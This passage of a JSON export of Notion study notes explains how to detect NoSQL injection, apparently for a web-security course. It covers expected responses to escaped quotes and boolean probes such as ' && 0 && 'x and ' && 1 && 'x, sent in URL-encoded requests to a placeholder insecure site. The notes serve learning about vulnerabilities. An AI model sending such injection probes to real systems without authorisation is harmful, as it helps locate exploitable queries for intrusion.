'","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-804f-96ca-c27a8e707198","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected behavior:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected behavior:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8060-b376-eaa5c89b5297","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T14:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"1- The page should respond normally — no crash, no database error.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"1- The page should respond normally — no crash, no database error.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-800d-abe3-ff37b9435ffa","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T14:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"2- It might just show “no results found” or ignore the special character entirely.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"2- It might just show “no results found” or ignore the special character entirely.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8049-bd52-cfd997f430fc","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"So, your input is either sanitized (dangerous characters removed/escaped automatically) or parameterized (your input is treated as pure data, not query syntax).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"So, your input is either sanitized (dangerous characters removed/escaped automatically) or parameterized (your input is treated as pure data, not query syntax).","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-808a-8af4-deeae3dcd278","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:52:00.000Z","last_edited_time":"2025-08-15T13:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-805d-83a4-fb0b86330137","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Case 2 – You submit \\'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Case 2 – You submit \\'","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8091-aadb-dc9dd0b73909","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected behavior:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected behavior:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ce-8151-ceb6e3115fb1","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T14:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"1- Same as above — no crash, no special handling.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"1- Same as above — no crash, no special handling.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-805a-9494-dd9cae88f50d","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T14:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"2- The site just searches for a category literally named \\' (which likely doesn’t exist).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"2- The site just searches for a category literally named \\' (which likely doesn’t exist).","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c8-9572-e407f80fc120","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"So, In a secure application, the backslash \\ is treated as a literal character, not as an escape to fix syntax.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"So, In a secure application, the backslash \\ is treated as a literal character, not as an escape to fix syntax.","href":null}],"icon":null,"color":"default"},"archived":false}]}]},{"object":"block","id":"250dc9c5-3059-80be-8c23-e26e8b51f95d","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-15T14:33:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"3. Confirming conditional behavior","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"3. Confirming conditional behavior","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-802f-8545-e7c2f72e71f9","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"After detecting a vulnerability, the next step is to determine whether you can influence boolean conditions using NoSQL syntax.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"After detecting a vulnerability, the next step is to determine whether you can influence boolean conditions using NoSQL syntax.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8081-bac3-e1bba6592b56","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Adding ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Adding ","href":null},{"type":"text","text":{"content":"0","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"0","href":null},{"type":"text","text":{"content":" (false) or ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (false) or ","href":null},{"type":"text","text":{"content":"1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"1","href":null},{"type":"text","text":{"content":" (true) lets you see if your injected code is actually running on the server.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (true) lets you see if your injected code is actually running on the server.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8015-8bcb-fd302cdef4b5","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If ","href":null},{"type":"text","text":{"content":"both requests give the same result →","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"both requests give the same result →","href":null},{"type":"text","text":{"content":" your injection may not be affecting the query.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" your injection may not be affecting the query.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80e5-bd9b-e6b9ee3397eb","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Different responses = ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Different responses = ","href":null},{"type":"text","text":{"content":"proof that you can manipulate conditions in the query","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"proof that you can manipulate conditions in the query","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8004-aa0c-c62135c2af31","parent":{"type":"block_id","block_id":"250dc9c5-3059-80e5-bd9b-e6b9ee3397eb"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:39:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If ","href":null},{"type":"text","text":{"content":"the false condition request changes or breaks the output →","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"the false condition request changes or breaks the output →","href":null},{"type":"text","text":{"content":" you’re controlling part of the query logic.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" you’re controlling part of the query logic.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-802d-9b54-f0a6850d41fb","parent":{"type":"block_id","block_id":"250dc9c5-3059-80e5-bd9b-e6b9ee3397eb"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:39:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If ","href":null},{"type":"text","text":{"content":"the true condition works normally →","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"the true condition works normally →","href":null},{"type":"text","text":{"content":" it confirms the injection is real and usable.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" it confirms the injection is real and usable.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8013-8602-dcbbdb0221d7","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"How you test it","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"How you test it","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8076-8885-da5f9739ae1e","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Pick something that should evaluate to false:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Pick something that should evaluate to false:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80e7-b8e5-e65d8b0a9047","parent":{"type":"block_id","block_id":"250dc9c5-3059-8076-8885-da5f9739ae1e"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"' && 0 && 'x","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"' && 0 && 'x","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-8056-9bab-c4b0a82df34f","parent":{"type":"block_id","block_id":"250dc9c5-3059-8076-8885-da5f9739ae1e"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"(","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"(","href":null},{"type":"text","text":{"content":"0","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"0","href":null},{"type":"text","text":{"content":" is false in most programming/database contexts.)","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is false in most programming/database contexts.)","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-807a-92f4-f88bf85f56c9","parent":{"type":"block_id","block_id":"250dc9c5-3059-8076-8885-da5f9739ae1e"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:40:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"In many NoSQL query languages (like MongoDB), ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"In many NoSQL query languages (like MongoDB), ","href":null},{"type":"text","text":{"content":"&&","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&&","href":null},{"type":"text","text":{"content":" means “AND.”","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" means “AND.”","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-805c-9b61-f3dbe851520e","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Pick something that should evaluate to true:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Pick something that should evaluate to true:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8076-9fc9-c04386b2deb5","parent":{"type":"block_id","block_id":"250dc9c5-3059-805c-9b61-f3dbe851520e"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"' && 1 && 'x","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"' && 1 && 'x","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-80d4-aaef-c7f27139cb89","parent":{"type":"block_id","block_id":"250dc9c5-3059-805c-9b61-f3dbe851520e"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"(","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"(","href":null},{"type":"text","text":{"content":"1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"1","href":null},{"type":"text","text":{"content":" is true in most programming/database contexts.)","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is true in most programming/database contexts.)","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-803c-b6f1-c668b23c871a","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Send them as part of the input","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Send them as part of the input","href":null},{"type":"text","text":{"content":":","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":":","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-808a-b635-e9499b113397","parent":{"type":"block_id","block_id":"250dc9c5-3059-803c-b6f1-c668b23c871a"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x\nhttps://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x\nhttps://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-80d0-9ae9-d9a680d3fb55","parent":{"type":"block_id","block_id":"250dc9c5-3059-803c-b6f1-c668b23c871a"},"created_time":"2025-08-15T14:35:00.000Z","last_edited_time":"2025-08-15T14:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"(Note: ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"(Note: ","href":null},{"type":"text","text":{"content":"%26%26","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"%26%26","href":null},{"type":"text","text":{"content":" is URL encoding for ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is URL encoding for ","href":null},{"type":"text","text":{"content":"&&","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&&","href":null},{"type":"text","text":{"content":".)","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".)","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1","parent":{"type":"block_id","block_id":"250dc9c5-3059-80be-8c23-e26e8b51f95d"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"quote","quote":{"rich_text":[{"type":"text","text":{"content":"Query Explaination","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query Explaination","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-800c-ae43-c6c6c3402e34","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"' && 0 && 'x","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"' && 0 && 'x","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-80fc-88c0-e48d27fd0c9a","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80c7-872d-eaaa3ba46ae4","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"1. The first ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"1. The first ","href":null},{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":" (single quote)","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (single quote)","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f1-89d0-d5b4659b5daf","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" to break out of whatever string the application is putting your input into.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" to break out of whatever string the application is putting your input 